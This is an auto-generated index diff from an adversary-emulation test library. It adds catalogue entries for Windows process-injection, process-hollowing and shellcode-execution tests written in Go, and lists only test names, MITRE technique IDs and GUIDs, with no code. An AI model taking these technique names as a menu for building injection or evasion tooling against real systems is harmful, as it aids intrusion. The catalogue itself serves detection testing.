Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -171,6 +171,13 @@ defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+defense-evasion,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+defense-evasion,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+defense-evasion,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+defense-evasion,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+defense-evasion,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+defense-evasion,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+defense-evasion,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -335,6 +342,8 @@ defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W3
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
@@ -438,6 +447,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
@@ -641,6 +652,13 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+privilege-escalation,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+privilege-escalation,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+privilege-escalation,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+privilege-escalation,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+privilege-escalation,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+privilege-escalation,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+privilege-escalation,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
 privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
@@ -688,6 +706,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
 privilege-escalation,T1547.015,Boot or Logon Autostart Execution: Login Items,1,Persistence by modifying Windows Terminal profile,ec5d76ef-82fe-48da-b931-bdb25a62bc65,powershell
@@ -752,6 +772,8 @@ privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,2,Create a use
 privilege-escalation,T1053.006,Scheduled Task/Job: Systemd Timers,3,Create a system level transient systemd service and timer,d3eda496-1fc0-49e9-aff5-3bec5da9fa22,sh
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
@@ -860,6 +882,7 @@ execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d
 execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
+execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
 execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
 execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -95,6 +95,13 @@ defense-evasion,T1055,Process Injection,2,Remote Process Injection in LSASS via
 defense-evasion,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 defense-evasion,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 defense-evasion,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+defense-evasion,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+defense-evasion,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+defense-evasion,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+defense-evasion,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+defense-evasion,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+defense-evasion,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+defense-evasion,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,1,mavinject - Inject DLL into running process,c426dacf-575d-4937-8611-a148a86a5e61,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,2,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,3,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt
@@ -219,6 +226,8 @@ defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
 defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
 defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
 defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
@@ -290,6 +299,8 @@ defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,48,Tamper wit
 defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,49,Tamper with Windows Defender Registry - Powershell,a72cfef8-d252-48b3-b292-635d332625c3,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+defense-evasion,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
 defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
 defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
@@ -431,6 +442,13 @@ privilege-escalation,T1055,Process Injection,2,Remote Process Injection in LSASS
 privilege-escalation,T1055,Process Injection,3,Section View Injection,c6952f41-6cf0-450a-b352-2ca8dae7c178,powershell
 privilege-escalation,T1055,Process Injection,4,Dirty Vanity process Injection,49543237-25db-497b-90df-d0a0a6e8fe2c,powershell
 privilege-escalation,T1055,Process Injection,5,Read-Write-Execute process Injection,0128e48e-8c1a-433a-a11a-a5387384f1e1,powershell
+privilege-escalation,T1055,Process Injection,6,Process Injection with Go using UuidFromStringA WinAPI,2315ce15-38b6-46ac-a3eb-5e21abef2545,powershell
+privilege-escalation,T1055,Process Injection,7,Process Injection with Go using EtwpCreateEtwThread WinAPI,7362ecef-6461-402e-8716-7410e1566400,powershell
+privilege-escalation,T1055,Process Injection,8,Remote Process Injection with Go using RtlCreateUserThread WinAPI,a0c1725f-abcd-40d6-baac-020f3cf94ecd,powershell
+privilege-escalation,T1055,Process Injection,9,Remote Process Injection with Go using CreateRemoteThread WinAPI,69534efc-d5f5-4550-89e6-12c6457b9edd,powershell
+privilege-escalation,T1055,Process Injection,10,Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively),2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39,powershell
+privilege-escalation,T1055,Process Injection,11,Process Injection with Go using CreateThread WinAPI,2871ed59-3837-4a52-9107-99500ebc87cb,powershell
+privilege-escalation,T1055,Process Injection,12,Process Injection with Go using CreateThread WinAPI (Natively),2a3c7035-d14f-467a-af94-933e49fe6786,powershell
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,1,Shortcut Modification,ce4fc678-364f-4282-af16-2fb4c78005ce,command_prompt
 privilege-escalation,T1547.009,Boot or Logon Autostart Execution: Shortcut Modification,2,Create shortcut to cmd in startup folders,cfdc954d-4bb0-4027-875b-a1893ce406f2,powershell
 privilege-escalation,T1547.005,Boot or Logon Autostart Execution: Security Support Provider,1,Modify HKLM:\System\CurrentControlSet\Control\Lsa Security Support Provider configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell
@@ -456,6 +474,8 @@ privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt
 privilege-escalation,T1546.008,Event Triggered Execution: Accessibility Features,3,Create Symbolic Link From osk.exe to cmd.exe,51ef369c-5e87-4f33-88cd-6d61be63edf2,command_prompt
 privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,2,EarlyBird APC Queue Injection in Go,73785dd2-323b-4205-ab16-bb6f06677e14,powershell
+privilege-escalation,T1055.004,Process Injection: Asynchronous Procedure Call,3,Remote Process Injection with Go using NtQueueApcThreadEx WinAPI,4cc571b1-f450-414a-850f-879baf36aa06,powershell
 privilege-escalation,T1546.009,Event Triggered Execution: AppCert DLLs,1,Create registry persistence via AppCert DLL,a5ad6104-5bab-4c43-b295-b4c44c7c6b05,powershell
 privilege-escalation,T1055.002,Process Injection: Portable Executable Injection,1,Portable Executable Injection,578025d5-faa9-4f6d-8390-aae739d503e1,powershell
 privilege-escalation,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
@@ -500,6 +520,8 @@ privilege-escalation,T1098,Account Manipulation,15,Domain Password Policy Check:
 privilege-escalation,T1098,Account Manipulation,16,Domain Password Policy Check: Common Password Use,81959d03-c51f-49a1-bb24-23f1ec885578,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
 privilege-escalation,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,3,Process Hollowing in Go using CreateProcessW WinAPI,c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a,powershell
+privilege-escalation,T1055.012,Process Injection: Process Hollowing,4,Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012),94903cc5-d462-498a-b919-b1e5ab155fee,powershell
 privilege-escalation,T1546,Event Triggered Execution,1,Persistence with Custom AutodialDLL,aca9ae16-7425-4b6d-8c30-cad306fdbd5b,powershell
 privilege-escalation,T1546,Event Triggered Execution,2,HKLM - Persistence using CommandProcessor AutoRun key (With Elevation),a574dafe-a903-4cce-9701-14040f4f3532,powershell
 privilege-escalation,T1546,Event Triggered Execution,3,HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation),36b8dbf9-59b1-4e9b-a3bb-36e80563ef01,powershell
@@ -568,6 +590,7 @@ execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d
 execution,T1106,Native API,2,WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique,ce4e76e6-de70-4392-9efe-b281fc2b4087,powershell
 execution,T1106,Native API,3,WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique,7ec5b74e-8289-4ff2-a162-b6f286a33abd,powershell
 execution,T1106,Native API,4,WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique,e1f93a06-1649-4f07-89a8-f57279a7d60e,powershell
+execution,T1106,Native API,5,Run Shellcode via Syscall in Go,ae56083f-28d0-417d-84da-df4242da1f7c,powershell
 execution,T1072,Software Deployment Tools,1,Radmin Viewer Utility,b4988cad-6ed2-434d-ace5-ea2670782129,command_prompt
 execution,T1072,Software Deployment Tools,2,PDQ Deploy RAT,e447b83b-a698-4feb-bed1-a7aaf45c3443,command_prompt
 execution,T1059.001,Command and Scripting Interpreter: PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt

atomics/Indexes/Indexes-Markdown/index.md

@@ -221,6 +221,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -428,6 +435,8 @@
   - Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1647 Plist File Modification](../../T1647/T1647.md)
   - Atomic Test #1: Plist Modification [macos]
 - [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
@@ -563,6 +572,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1564.009 Resource Forking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #1: Decode base64 Data into Script [macos, linux]
@@ -861,6 +872,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - [T1611 Escape to Host](../../T1611/T1611.md)
   - Atomic Test #1: Deploy container using nsenter container escape [containers]
   - Atomic Test #2: Mount host filesystem to escape privileged Docker container [containers]
@@ -929,6 +947,8 @@
   - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1014,6 +1034,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
@@ -1172,6 +1194,7 @@
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
+  - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
 - T1059.009 Cloud API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1610 Deploy a container](../../T1610/T1610.md)
   - Atomic Test #1: Deploy Docker container [containers]

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -134,6 +134,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218 Signed Binary Proxy Execution](../../T1218/T1218.md)
   - Atomic Test #1: mavinject - Inject DLL into running process [windows]
@@ -292,6 +299,8 @@
   - Atomic Test #2: Creating W32Time similar named service using sc [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md)
   - Atomic Test #1: Mount ISO image [windows]
   - Atomic Test #2: Mount an ISO image and run executable from the ISO [windows]
@@ -389,6 +398,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
   - Atomic Test #2: Execute base64-encoded PowerShell [windows]
   - Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
@@ -601,6 +612,13 @@
   - Atomic Test #3: Section View Injection [windows]
   - Atomic Test #4: Dirty Vanity process Injection [windows]
   - Atomic Test #5: Read-Write-Execute process Injection [windows]
+  - Atomic Test #6: Process Injection with Go using UuidFromStringA WinAPI [windows]
+  - Atomic Test #7: Process Injection with Go using EtwpCreateEtwThread WinAPI [windows]
+  - Atomic Test #8: Remote Process Injection with Go using RtlCreateUserThread WinAPI [windows]
+  - Atomic Test #9: Remote Process Injection with Go using CreateRemoteThread WinAPI [windows]
+  - Atomic Test #10: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively) [windows]
+  - Atomic Test #11: Process Injection with Go using CreateThread WinAPI [windows]
